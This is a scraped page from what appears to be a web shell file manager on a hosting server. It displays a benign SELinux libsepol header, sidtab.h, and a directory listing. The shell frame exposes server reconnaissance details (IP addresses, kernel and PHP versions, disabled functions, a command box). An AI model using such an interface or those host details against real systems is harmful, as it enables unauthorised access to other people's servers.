GRAYBYTE WORDPRESS FILE MANAGER7318

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /usr/include/sepol/policydb/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/include/sepol/policydb//sidtab.h
/* Author : Stephen Smalley, <sds@tycho.nsa.gov> */

/* FLASK */

/*
 * A security identifier table (sidtab) is a hash table
 * of security context structures indexed by SID value.
 */

#ifndef _SEPOL_POLICYDB_SIDTAB_H_
#define _SEPOL_POLICYDB_SIDTAB_H_

#include <sepol/policydb/context.h>

#ifdef __cplusplus
extern "C" {
#endif

typedef struct sidtab_node {
	sepol_security_id_t sid;	/* security identifier */
	context_struct_t context;	/* security context structure */
	struct sidtab_node *next;
} sidtab_node_t;

typedef struct sidtab_node *sidtab_ptr_t;

#define SIDTAB_HASH_BITS 7
#define SIDTAB_HASH_BUCKETS (1 << SIDTAB_HASH_BITS)
#define SIDTAB_HASH_MASK (SIDTAB_HASH_BUCKETS-1)

#define SIDTAB_SIZE SIDTAB_HASH_BUCKETS

typedef struct {
	sidtab_ptr_t *htable;
	unsigned int nel;	/* number of elements */
	unsigned int next_sid;	/* next SID to allocate */
	unsigned char shutdown;
} sidtab_t;

extern int sepol_sidtab_init(sidtab_t * s);

extern int sepol_sidtab_insert(sidtab_t * s,
			       sepol_security_id_t sid,
			       context_struct_t * context);

extern context_struct_t *sepol_sidtab_search(sidtab_t * s,
					     sepol_security_id_t sid);

extern int sepol_sidtab_map(sidtab_t * s,
			    int (*apply) (sepol_security_id_t sid,
					  context_struct_t * context,
					  void *args), void *args);

extern void sepol_sidtab_map_remove_on_error(sidtab_t * s,
					     int (*apply) (sepol_security_id_t
							   s,
							   context_struct_t *
							   context, void *args),
					     void *args);

extern int sepol_sidtab_context_to_sid(sidtab_t * s,	/* IN */
				       context_struct_t * context,	/* IN */
				       sepol_security_id_t * sid);	/* OUT */

extern void sepol_sidtab_hash_eval(sidtab_t * h, char *tag);

extern void sepol_sidtab_destroy(sidtab_t * s);

extern void sepol_sidtab_set(sidtab_t * dst, sidtab_t * src);

extern void sepol_sidtab_shutdown(sidtab_t * s);

#ifdef __cplusplus
}
#endif

#endif				/* _SIDTAB_H_ */

/* FLASK */

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
March 03 2024 20:40:13
root / root
0755
avrule_block.h
1.599 KB
October 09 2021 02:44:18
root / root
0644
avtab.h
4.632 KB
October 09 2021 02:44:18
root / root
0644
conditional.h
4.622 KB
October 09 2021 02:44:18
root / root
0644
constraint.h
2.511 KB
October 09 2021 02:44:18
root / root
0644
context.h
3.254 KB
October 09 2021 02:44:18
root / root
0644
ebitmap.h
3.102 KB
October 09 2021 02:44:18
root / root
0644
expand.h
3.57 KB
October 09 2021 02:44:18
root / root
0644
flask.h
4.875 KB
October 09 2021 02:44:18
root / root
0644
flask_types.h
1.737 KB
October 09 2021 02:44:18
root / root
0644
hashtab.h
4.289 KB
October 09 2021 02:44:18
root / root
0644
hierarchy.h
1.775 KB
October 09 2021 02:44:18
root / root
0644
link.h
0.505 KB
October 09 2021 02:44:18
root / root
0644
mls_types.h
4.273 KB
October 09 2021 02:44:18
root / root
0644
module.h
1.496 KB
October 09 2021 02:44:18
root / root
0644
polcaps.h
0.704 KB
October 09 2021 02:44:18
root / root
0644
policydb.h
25.367 KB
October 09 2021 02:44:18
root / root
0644
services.h
8.382 KB
October 09 2021 02:44:18
root / root
0644
sidtab.h
1.93 KB
October 09 2021 02:44:18
root / root
0644
symtab.h
1.076 KB
October 09 2021 02:44:18
root / root
0644
util.h
1.427 KB
October 09 2021 02:44:18
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF